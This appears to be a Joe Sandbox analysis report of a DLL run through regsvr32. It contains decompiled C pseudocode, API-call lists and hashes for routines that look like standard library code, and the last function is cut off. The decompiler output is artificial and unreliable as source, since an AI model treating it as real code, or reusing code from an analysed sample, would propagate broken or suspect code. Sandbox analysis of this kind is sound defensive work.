                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,?,10030BC6,00000000), ref: 10028BCF
                                                                        • GetProcAddress.KERNEL32(00000000,SetLayout), ref: 10028BDD
                                                                        • SetLastError.KERNEL32(00000078,?,?,10030BC6,00000000), ref: 10028BFF
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$SetLayout
                                                                        • API String ID: 4275029093-2147214759
                                                                        • Opcode ID: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction ID: de10e2654153e74bad07dc63c5cb2a97a5a293e8e121725d640a5f2c86b9b1e6
                                                                        • Opcode Fuzzy Hash: f829d107276f7f8dc5ff7ef364a20be20c27fb831297046e44f9a224b6ca2c99
                                                                        • Instruction Fuzzy Hash: 1AE02077105110BFD253875A9C48C5F7B62D7C4372B11C619F276D5090CB3188018721
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10028B90(signed int __ecx) {
                                                                        				_Unknown_base(*)()* _t3;
                                                                        				signed int _t7;
                                                                        				signed int _t8;
                                                                        
                                                                        				_t7 = __ecx;
                                                                        				_t3 = GetProcAddress(GetModuleHandleA("GDI32.DLL"), "GetLayout");
                                                                        				if(_t3 == 0) {
                                                                        					_t8 = _t7 | 0xffffffff;
                                                                        					SetLastError(0x78);
                                                                        				} else {
                                                                        					_t8 =  *_t3( *((intOrPtr*)(_t7 + 4)));
                                                                        				}
                                                                        				return _t8;
                                                                        			}







                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(GDI32.DLL,?,10030BB9), ref: 10028B98
                                                                        • GetProcAddress.KERNEL32(00000000,GetLayout), ref: 10028BA4
                                                                        • SetLastError.KERNEL32(00000078), ref: 10028BBC
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressErrorHandleLastModuleProc
                                                                        • String ID: GDI32.DLL$GetLayout
                                                                        • API String ID: 4275029093-2396518106
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 68%
                                                                        			E10011DCF(int _a4) {
                                                                        				struct HINSTANCE__* _t3;
                                                                        				_Unknown_base(*)()* _t4;
                                                                        
                                                                        				_t3 = GetModuleHandleA("mscoree.dll");
                                                                        				if(_t3 != 0) {
                                                                        					_t4 = GetProcAddress(_t3, "CorExitProcess");
                                                                        					if(_t4 != 0) {
                                                                        						 *_t4(_a4);
                                                                        					}
                                                                        				}
                                                                        				ExitProcess(_a4);
                                                                        			}


                                                                        APIs
                                                                        • GetModuleHandleA.KERNEL32(mscoree.dll,10011F3D,?,10041DB0,00000008,10011F63,?,00000001,00000000,10016CF1,00000003), ref: 10011DD4
                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 10011DE4
                                                                        • ExitProcess.KERNEL32 ref: 10011DF8
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: AddressExitHandleModuleProcProcess
                                                                        • String ID: CorExitProcess$mscoree.dll
                                                                        • API String ID: 75539706-1276376045
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 78%
                                                                        			E10018BEF(intOrPtr* _a4) {
                                                                        				signed int _v8;
                                                                        				signed int _v12;
                                                                        				signed int _v16;
                                                                        				intOrPtr _v20;
                                                                        				intOrPtr _v24;
                                                                        				void* __edi;
                                                                        				void* __ebp;
                                                                        				intOrPtr* _t89;
                                                                        				void* _t90;
                                                                        				void* _t101;
                                                                        				intOrPtr _t112;
                                                                        				void* _t115;
                                                                        				signed int _t120;
                                                                        				signed int _t125;
                                                                        				intOrPtr _t132;
                                                                        				intOrPtr _t133;
                                                                        				void* _t138;
                                                                        				intOrPtr _t140;
                                                                        				signed int _t142;
                                                                        				signed int _t143;
                                                                        				signed int _t146;
                                                                        				signed int _t147;
                                                                        				signed int _t148;
                                                                        				signed int _t149;
                                                                        				signed int _t150;
                                                                        				signed int _t152;
                                                                        				void* _t159;
                                                                        				intOrPtr _t162;
                                                                        				signed int _t164;
                                                                        				signed int _t165;
                                                                        				void* _t168;
                                                                        				void* _t169;
                                                                        				void* _t170;
                                                                        				void* _t172;
                                                                        				intOrPtr* _t173;
                                                                        				intOrPtr _t174;
                                                                        				void* _t176;
                                                                        				intOrPtr _t180;
                                                                        
                                                                        				_t89 = _a4;
                                                                        				_v12 = _v12 & 0x00000000;
                                                                        				_t133 =  *((intOrPtr*)(_t89 + 4));
                                                                        				_t162 =  *_t89;
                                                                        				_v24 = _t162;
                                                                        				_v20 = _t133;
                                                                        				_t90 = E1001519D(_t162);
                                                                        				_t174 = _t133;
                                                                        				_t172 = _t90;
                                                                        				if(_t174 < 0 || _t174 <= 0 && _t162 < 0) {
                                                                        					L28:
                                                                        					return 0;
                                                                        				} else {
                                                                        					_t176 = _t133 - 0x1000;
                                                                        					if(_t176 > 0 || _t176 >= 0 && _t162 > 0) {
                                                                        						goto L28;
                                                                        					} else {
                                                                        						if( *((intOrPtr*)(_t172 + 0x44)) != 0) {
                                                                        							L9:
                                                                        							_t173 =  *((intOrPtr*)(_t172 + 0x44));
                                                                        							L10:
                                                                        							_t142 = E10013780(_t162, _t133, 0x1e13380, 0) + 0x46;
                                                                        							_t10 = _t142 + 0x12b; // 0xe5
                                                                        							asm("cdq");
                                                                        							_t15 = _t142 - 1; // -71
                                                                        							_v16 = _t15;
                                                                        							_v8 = _t142;
                                                                        							asm("cdq");
                                                                        							_t164 = 0x64;
                                                                        							_t165 = 4;
                                                                        							asm("cdq");
                                                                        							_t28 = _v16 / _t165 - 0x11; // 0xd4
                                                                        							asm("cdq");
                                                                        							_t29 = _t142 - 0x46; // -140
                                                                        							asm("cdq");
                                                                        							_t101 = E100122A0(_t29, _v16 % _t165, 0xfffffe93, 0xffffffff);
                                                                        							asm("sbb edx, ebx");
                                                                        							_t138 = 0x15180;
                                                                        							_t168 = _v24 + E100122A0(_t101 - _t10 / 0x190 - _t15 / _t164 + _t28, _v16 % _t165, 0x15180, 0);
                                                                        							asm("adc [ebp-0x10], edx");
                                                                        							_t180 = _v20;
                                                                        							if(_t180 > 0 || _t180 >= 0 && _t168 >= 0) {
                                                                        								asm("cdq");
                                                                        								_t143 = 4;
                                                                        								if(_v8 % _t143 != 0) {
                                                                        									L19:
                                                                        									asm("cdq");
                                                                        									_t158 = (_v8 + 0x76c) % 0x190;
                                                                        									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                        										goto L21;
                                                                        									}
                                                                        									goto L20;
                                                                        								}
                                                                        								asm("cdq");
                                                                        								_t149 = 0x64;
                                                                        								_t158 = _v8 % _t149;
                                                                        								if(_v8 % _t149 != 0) {
                                                                        									goto L20;
                                                                        								}
                                                                        								goto L19;
                                                                        							} else {
                                                                        								_t125 = _v16;
                                                                        								_v8 = _t125;
                                                                        								_t168 = _t168 + 0x1e13380;
                                                                        								asm("adc dword [ebp-0x10], 0x0");
                                                                        								asm("cdq");
                                                                        								_t150 = 4;
                                                                        								if(_t125 % _t150 != 0) {
                                                                        									L15:
                                                                        									asm("cdq");
                                                                        									_t158 = (_v8 + 0x76c) % 0x190;
                                                                        									if((_v8 + 0x76c) % 0x190 != 0) {
                                                                        										L21:
                                                                        										 *((intOrPtr*)(_t173 + 0x14)) = _v8;
                                                                        										 *((intOrPtr*)(_t173 + 0x1c)) = E10013780(_t168, _v20, _t138, 0);
                                                                        										asm("cdq");
                                                                        										_t169 = _t168 + E100122A0(_t110, _t158, 0xfffeae80, 0xffffffff);
                                                                        										asm("adc [ebp-0x10], edx");
                                                                        										_t159 = 0x1004ce98;
                                                                        										if(_v12 == 0) {
                                                                        											_t159 = 0x1004cecc;
                                                                        										}
                                                                        										_t112 =  *((intOrPtr*)(_t173 + 0x1c));
                                                                        										_t146 = 1;
                                                                        										if( *((intOrPtr*)(_t159 + 4)) >= _t112) {
                                                                        											L27:
                                                                        											_t147 = _t146 - 1;
                                                                        											 *(_t173 + 0x10) = _t147;
                                                                        											 *((intOrPtr*)(_t173 + 0xc)) = _t112 -  *((intOrPtr*)(_t159 + _t147 * 4));
                                                                        											_t115 = E10013780( *_a4,  *((intOrPtr*)(_a4 + 4)), _t138, 0);
                                                                        											_t148 = 7;
                                                                        											asm("cdq");
                                                                        											 *(_t173 + 0x18) = (_t115 + 4) % _t148;
                                                                        											 *((intOrPtr*)(_t173 + 8)) = E10013780(_t169, _v20, 0xe10, 0);
                                                                        											asm("cdq");
                                                                        											_t170 = _t169 + E100122A0(_t118, (_t115 + 4) % _t148, 0xfffff1f0, 0xffffffff);
                                                                        											asm("adc [ebp-0x10], edx");
                                                                        											_t120 = E10013780(_t170, _v20, 0x3c, 0);
                                                                        											 *(_t173 + 4) = _t120;
                                                                        											 *_t173 = _t170 - _t120 * 0x3c;
                                                                        											 *((intOrPtr*)(_t173 + 0x20)) = 0;
                                                                        											return _t173;
                                                                        										} else {
                                                                        											_t140 = _t112;
                                                                        											do {
                                                                        												_t146 = _t146 + 1;
                                                                        											} while ( *((intOrPtr*)(_t159 + _t146 * 4)) < _t140);
                                                                        											_t138 = 0x15180;
                                                                        											goto L27;
                                                                        										}
                                                                        									}
                                                                        									L16:
                                                                        									_t168 = _t168 + _t138;
                                                                        									asm("adc dword [ebp-0x10], 0x0");
                                                                        									L20:
                                                                        									_v12 = 1;
                                                                        									goto L21;
                                                                        								}
                                                                        								asm("cdq");
                                                                        								_t152 = 0x64;
                                                                        								_t158 = _v8 % _t152;
                                                                        								if(_v8 % _t152 != 0) {
                                                                        									goto L16;
                                                                        								}
                                                                        								goto L15;
                                                                        							}
                                                                        						}
                                                                        						_t132 = E100107B6(0x24);
                                                                        						 *((intOrPtr*)(_t172 + 0x44)) = _t132;
                                                                        						if(_t132 != 0) {
                                                                        							goto L9;
                                                                        						}
                                                                        						_t173 = 0x1004f744;
                                                                        						goto L10;
                                                                        					}
                                                                        				}
                                                                        			}

                                                                        0x10018cfe
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018cfe
                                                                        0x10018cd1
                                                                        0x10018c41
                                                                        0x10018c49
                                                                        0x10018c4c
                                                                        0x00000000
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x00000000
                                                                        0x10018c4e
                                                                        0x10018c29

                                                                        APIs
                                                                          • Part of subcall function 1001519D: GetLastError.KERNEL32(?,00000000,100136FA,100139FA,00000000,10041E50,00000008,10013A51,?,?,?,10015293,0000000D,10041EB0,00000010,10015375), ref: 1001519F
                                                                          • Part of subcall function 1001519D: FlsGetValue.KERNEL32(?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?,10041D40), ref: 100151AD
                                                                          • Part of subcall function 1001519D: FlsSetValue.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 100151D4
                                                                          • Part of subcall function 1001519D: GetCurrentThreadId.KERNEL32 ref: 100151EC
                                                                          • Part of subcall function 1001519D: SetLastError.KERNEL32(00000000,?,10015293,0000000D,10041EB0,00000010,10015375,?,10011310,00000000,?,?,10011379,?,?,?), ref: 10015203
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018C61
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018D5E
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DB7
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DD4
                                                                        • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 10018DF7
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@$ErrorLastValue$CurrentThread
                                                                        • String ID:
                                                                        • API String ID: 223281555-0
                                                                        • Opcode ID: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction ID: 428b4c813f629567aa63a678bca7b6061bdb39fa1b2836493da5e96e2c7cad82
                                                                        • Opcode Fuzzy Hash: 1693e817e5266281a194762ea474d98223fd442ae3dcdc5ad9847de1fdbd58a6
                                                                        • Instruction Fuzzy Hash: 3361B1B6A00306ABD714DEA9CC41BAEB3F6EB84354F25452DF5119B2C1D7B5EB808B50
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 59%
                                                                        			E1002D821(intOrPtr __ecx, void* __edx) {
                                                                        				void* __ebx;
                                                                        				void* __esi;
                                                                        				void* __ebp;
                                                                        				intOrPtr _t70;
                                                                        				signed char _t75;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				signed int _t85;
                                                                        				signed int _t87;
                                                                        				void* _t95;
                                                                        				intOrPtr _t125;
                                                                        				intOrPtr _t133;
                                                                        				void* _t147;
                                                                        				void* _t151;
                                                                        				intOrPtr _t155;
                                                                        				void* _t158;
                                                                        				void* _t160;
                                                                        
                                                                        				_t147 = __edx;
                                                                        				_t158 = _t160 - 0xb0;
                                                                        				_t70 =  *0x1004c470; // 0x303bb91f
                                                                        				_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                        				 *((intOrPtr*)(_t158 + 0xac)) = _t70;
                                                                        				_t125 = __ecx;
                                                                        				_t72 = GetWindowRect( *(_t155 + 0x1c), _t158 - 0x80);
                                                                        				if( *((intOrPtr*)(_t155 + 0x88)) != _t125 ||  *(_t158 + 0xbc) != 0 && EqualRect(_t158 - 0x80,  *(_t158 + 0xbc)) == 0) {
                                                                        					if( *((intOrPtr*)(_t125 + 0x90)) != 0 && ( *(_t155 + 0x80) & 0x00000040) != 0) {
                                                                        						 *(_t125 + 0x7c) =  *(_t125 + 0x7c) | 0x00000040;
                                                                        					}
                                                                        					 *(_t125 + 0x7c) =  *(_t125 + 0x7c) & 0xfffffff9;
                                                                        					_t75 =  *(_t155 + 0x7c) & 0x00000006 |  *(_t125 + 0x7c);
                                                                        					 *(_t125 + 0x7c) = _t75;
                                                                        					if((_t75 & 0x00000040) == 0) {
                                                                        						_push(0x104);
                                                                        						_push(_t158 - 0x58);
                                                                        						E1002095F(_t155);
                                                                        						E10029B23(_t155,  *((intOrPtr*)(_t125 + 0x1c)), _t158 - 0x58);
                                                                        					}
                                                                        					_t80 = ( *(_t155 + 0x7c) ^  *(_t125 + 0x7c)) & 0x0000f000 ^  *(_t155 + 0x7c) | 0x00000f00;
                                                                        					if( *((intOrPtr*)(_t125 + 0x90)) == 0) {
                                                                        						_t81 = _t80 & 0xfffffffe;
                                                                        					} else {
                                                                        						_t81 = _t80 | 0x00000001;
                                                                        					}
                                                                        					E100383D0(_t155, _t81);
                                                                        					 *((intOrPtr*)(_t158 - 0x6c)) = 0;
                                                                        					if( *((intOrPtr*)(_t155 + 0x88)) != _t125 && IsWindowVisible( *(_t155 + 0x1c)) != 0) {
                                                                        						E100204FE(_t155, 0, 0, 0, 0, 0, 0x97);
                                                                        						 *((intOrPtr*)(_t158 - 0x6c)) = 1;
                                                                        					}
                                                                        					 *(_t158 - 0x70) =  *(_t158 - 0x70) | 0xffffffff;
                                                                        					if( *(_t158 + 0xbc) == 0) {
                                                                        						_t57 = _t125 + 0x94; // 0x94
                                                                        						_t150 = _t57;
                                                                        						E1001E2BE(_t57, _t158,  *((intOrPtr*)(_t57 + 8)), _t155);
                                                                        						E1001E2BE(_t150, _t158,  *((intOrPtr*)(_t150 + 8)), 0);
                                                                        						_t85 =  *0x1004efa4; // 0x2
                                                                        						_t151 = 0;
                                                                        						_t87 =  *0x1004efa0; // 0x2
                                                                        						E100204FE(_t155, 0,  ~_t87,  ~_t85, 0, 0, 0x115);
                                                                        					} else {
                                                                        						CopyRect(_t158 - 0x68,  *(_t158 + 0xbc));
                                                                        						E10028E5A(_t125, _t158 - 0x68);
                                                                        						asm("cdq");
                                                                        						asm("cdq");
                                                                        						_push(( *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)) - _t147 >> 1) +  *((intOrPtr*)(_t158 - 0x64)));
                                                                        						_push(( *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68) - _t147 >> 1) +  *(_t158 - 0x68));
                                                                        						_push( *((intOrPtr*)(_t158 + 0xb8)));
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						asm("movsd");
                                                                        						 *(_t158 - 0x70) = E1002CE2A(_t125);
                                                                        						E100204FE( *((intOrPtr*)(_t158 + 0xb8)), 0,  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x64)),  *((intOrPtr*)(_t158 - 0x60)) -  *(_t158 - 0x68),  *((intOrPtr*)(_t158 - 0x5c)) -  *((intOrPtr*)(_t158 - 0x64)), 0x114);
                                                                        						_t155 =  *((intOrPtr*)(_t158 + 0xb8));
                                                                        						_t151 = 0;
                                                                        					}
                                                                        					if(E100220EE(_t158, GetParent( *(_t155 + 0x1c))) != _t125) {
                                                                        						E1000870E(_t155, _t125);
                                                                        					}
                                                                        					_t133 =  *((intOrPtr*)(_t155 + 0x88));
                                                                        					if(_t133 != _t125) {
                                                                        						if(_t133 != _t151) {
                                                                        							if( *((intOrPtr*)(_t125 + 0x90)) == _t151 ||  *((intOrPtr*)(_t133 + 0x90)) != _t151) {
                                                                        								_t95 = 0;
                                                                        							} else {
                                                                        								_t95 = 1;
                                                                        							}
                                                                        							_push(_t95);
                                                                        							_push(0xffffffff);
                                                                        							goto L27;
                                                                        						}
                                                                        					} else {
                                                                        						_push(_t151);
                                                                        						_push( *(_t158 - 0x70));
                                                                        						L27:
                                                                        						_push(_t155);
                                                                        						E1002D1B2(_t133);
                                                                        					}
                                                                        					 *((intOrPtr*)(_t155 + 0x88)) = _t125;
                                                                        					if( *((intOrPtr*)(_t158 - 0x6c)) != _t151) {
                                                                        						E100204FE(_t155, _t151, _t151, _t151, _t151, _t151, 0x57);
                                                                        					}
                                                                        					E1002D14B(_t125, _t125, _t158, _t155);
                                                                        					 *(E100314D8(_t125) + 0xcc) =  *(_t72 + 0xcc) | 0x0000000c;
                                                                        				}
                                                                        				return E100117AE(_t72,  *((intOrPtr*)(_t158 + 0xac)));
                                                                        			}





















                                                                        APIs
                                                                        • GetWindowRect.USER32 ref: 1002D84C
                                                                        • EqualRect.USER32 ref: 1002D872
                                                                        • IsWindowVisible.USER32 ref: 1002D900
                                                                        • CopyRect.USER32 ref: 1002D93C
                                                                        • GetParent.USER32(?), ref: 1002D9FA
                                                                          • Part of subcall function 1000870E: SetParent.USER32(?,00000000), ref: 1000871D
                                                                        Memory Dump Source
                                                                        • Source File: 00000002.00000002.441047171.0000000010001000.00000020.00000001.01000000.00000005.sdmp, Offset: 10000000, based on PE: true
                                                                        • Associated: 00000002.00000002.441039881.0000000010000000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441089778.000000001003C000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441102742.000000001004B000.00000004.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441272413.0000000010051000.00000002.00000001.01000000.00000005.sdmp
                                                                        • Associated: 00000002.00000002.441818626.000000001009A000.00000002.00000001.01000000.00000005.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                        Similarity
                                                                        • API ID: Rect$ParentWindow$CopyEqualVisible
                                                                        • String ID:
                                                                        • API String ID: 545338366-0
                                                                        • Opcode ID: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction ID: 33a625b915a49ab54241972194f75ebdbdf7b4231d1b3c0eb1f8f86e0de30ee8
                                                                        • Opcode Fuzzy Hash: b7172a7f28e0920b39c9b267a61c58c2106efd665f0b045fbba897e8ea2e6f4b
                                                                        • Instruction Fuzzy Hash: 86619A71600649AFDB61EFA8DC85FAE77FAEB44300F50812AE959DB196CB30AC45CB11
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        C-Code - Quality: 100%
                                                                        			E10014691(signed int _a4) {
                                                                        				intOrPtr _v8;
                                                                        				struct _MEMORY_BASIC_INFORMATION _v36;
                                                                        				signed int _t51;
                                                                        				void* _t52;
                                                                        				signed int _t53;
                                                                        				signed int _t55;
                                                                        				signed int _t56;
                                                                        				signed int _t57;
                                                                        				signed int* _t60;
                                                                        				intOrPtr* _t61;
                                                                        				intOrPtr _t63;
                                                                        				signed int _t64;
                                                                        				signed int* _t66;
                                                                        				signed int _t67;
                                                                        				intOrPtr _t68;
                                                                        				void* _t69;
                                                                        				signed int _t70;
                                                                        				void* _t71;
                                                                        				intOrPtr _t73;
                                                                        				void _t74;
                                                                        				signed int _t75;
                                                                        				signed int _t76;
                                                                        				short* _t77;
                                                                        				void* _t79;
                                                                        				signed int _t80;
                                                                        				signed int _t81;
                                                                        				signed int _t82;
                                                                        				signed int _t83;
                                                                        				intOrPtr _t88;
                                                                        				signed int _t91;
                                                                        				signed int _t92;
                                                                        				signed int _t93;
                                                                        
                                                                        				_t92 = _a4;
                                                                        				_t69 =  *(_t92 + 8);
                                                                        				if((_t69 & 0x00000003) != 0) {
                                                                        					L3:
                                                                        					return 0;
                                                                        				}
                                                                        				_a4 =  *[fs:0x18];
                                                                        				_t51 = _a4;
                                                                        				_t73 =  *((intOrPtr*)(_t51 + 8));
                                                                        				_v8 = _t73;
                                                                        				if(_t69 < _t73 || _t69 >=  *((intOrPtr*)(_t51 + 4))) {
                                                                        					_t88 =  *((intOrPtr*)(_t92 + 0xc));
                                                                        					__eflags = _t88 - 0xffffffff;
                                                                        					if(_t88 != 0xffffffff) {
                                                                        						_t81 = 0;
                                                                        						__eflags = 0;
                                                                        						_a4 = 0;
                                                                        						_t52 = _t69;
                                                                        						do {
                                                                        							_t74 =  *_t52;
                                                                        							__eflags = _t74 - 0xffffffff;
                                                                        							if(_t74 == 0xffffffff) {
                                                                        								goto L9;
                                                                        							}
                                                                        							__eflags = _t74 - _t81;
                                                                        							if(_t74 >= _t81) {
                                                                        								L41:
                                                                        								_t56 = 0;
                                                                        								L57:
                                                                        								return _t56;
                                                                        							}
                                                                        							L9:
                                                                        							__eflags =  *(_t52 + 4);
                                                                        							if( *(_t52 + 4) != 0) {
                                                                        								_t13 =  &_a4;
                                                                        								 *_t13 = _a4 + 1;
                                                                        								__eflags =  *_t13;
                                                                        							}
                                                                        							_t81 = _t81 + 1;
                                                                        							_t52 = _t52 + 0xc;
                                                                        							__eflags = _t81 - _t88;
                                                                        						} while (_t81 <= _t88);
                                                                        						__eflags = _a4;
                                                                        						if(_a4 == 0) {
                                                                        							L15:
                                                                        							_t53 =  *0x1004f590; // 0x0
                                                                        							_t91 = _t69 & 0xfffff000;
                                                                        							_t93 = 0;
                                                                        							__eflags = _t53;
                                                                        							if(_t53 <= 0) {
                                                                        								L18:
                                                                        								_t55 = VirtualQuery(_t69,  &_v36, 0x1c);
                                                                        								__eflags = _t55;
                                                                        								if(_t55 == 0) {
                                                                        									L56:
                                                                        									_t56 = _t55 | 0xffffffff;
                                                                        									__eflags = _t56;
                                                                        									goto L57;
                                                                        								}
                                                                        								__eflags = _v36.Type - 0x1000000;
                                                                        								if(_v36.Type != 0x1000000) {
                                                                        									goto L56;
                                                                        								}
                                                                        								__eflags = _v36.Protect & 0x000000cc;
                                                                        								if((_v36.Protect & 0x000000cc) == 0) {
                                                                        									L28:
                                                                        									_t57 = InterlockedExchange(0x1004f5d8, 1);
                                                                        									__eflags = _t57;
                                                                        									if(_t57 != 0) {
                                                                        										goto L5;
                                                                        									}
                                                                        									_t75 =  *0x1004f590; // 0x0
                                                                        									__eflags = _t75;
                                                                        									_t82 = _t75;
                                                                        									if(_t75 <= 0) {
                                                                        										L33:
                                                                        										__eflags = _t82;
                                                                        										if(_t82 != 0) {
                                                                        											L40:
                                                                        											InterlockedExchange(0x1004f5d8, 0);
                                                                        											goto L5;
                                                                        										}
                                                                        										_t70 = 0xf;
                                                                        										__eflags = _t75 - _t70;
                                                                        										if(_t75 <= _t70) {
                                                                        											_t70 = _t75;
                                                                        										}
                                                                        										_t83 = 0;
                                                                        										__eflags = _t70;
                                                                        										if(_t70 < 0) {
                                                                        											L38:
                                                                        											__eflags = _t75 - 0x10;
                                                                        											if(_t75 < 0x10) {
                                                                        												_t76 = _t75 + 1;
                                                                        												__eflags = _t76;
                                                                        												 *0x1004f590 = _t76;
                                                                        											}
                                                                        											goto L40;
                                                                        										} else {
                                                                        											do {
                                                                        												_t60 = 0x1004f598 + _t83 * 4;
                                                                        												_t83 = _t83 + 1;
                                                                        												__eflags = _t83 - _t70;
                                                                        												 *_t60 = _t91;
                                                                        												_t91 =  *_t60;
                                                                        											} while (_t83 <= _t70);
                                                                        											goto L38;
                                                                        										}
                                                                        									}
                                                                        									_t61 = 0x1004f594 + _t75 * 4;
                                                                        									while(1) {
                                                                        										__eflags =  *_t61 - _t91;
                                                                        										if( *_t61 == _t91) {
                                                                        											goto L33;
                                                                        										}
                                                                        										_t82 = _t82 - 1;
                                                                        										_t61 = _t61 - 4;
                                                                        										__eflags = _t82;
                                                                        										if(_t82 > 0) {
                                                                        											continue;
                                                                        										}
                                                                        										goto L33;
                                                                        									}
                                                                        									goto L33;
                                                                        								}
                                                                        								_t77 = _v36.AllocationBase;
                                                                        								__eflags =  *_t77 - 0x5a4d;
                                                                        								if( *_t77 != 0x5a4d) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t55 =  *((intOrPtr*)(_t77 + 0x3c)) + _t77;
                                                                        								__eflags =  *_t55 - 0x4550;
                                                                        								if( *_t55 != 0x4550) {
                                                                        									goto L56;
                                                                        								}
                                                                        								__eflags =  *((short*)(_t55 + 0x18)) - 0x10b;
                                                                        								if( *((short*)(_t55 + 0x18)) != 0x10b) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t71 = _t69 - _t77;
                                                                        								__eflags =  *((short*)(_t55 + 6));
                                                                        								_t79 = ( *(_t55 + 0x14) & 0x0000ffff) + _t55 + 0x18;
                                                                        								if( *((short*)(_t55 + 6)) <= 0) {
                                                                        									goto L56;
                                                                        								}
                                                                        								_t63 =  *((intOrPtr*)(_t79 + 0xc));
                                                                        								__eflags = _t71 - _t63;
                                                                        								if(_t71 < _t63) {
                                                                        									goto L28;
                                                                        								}
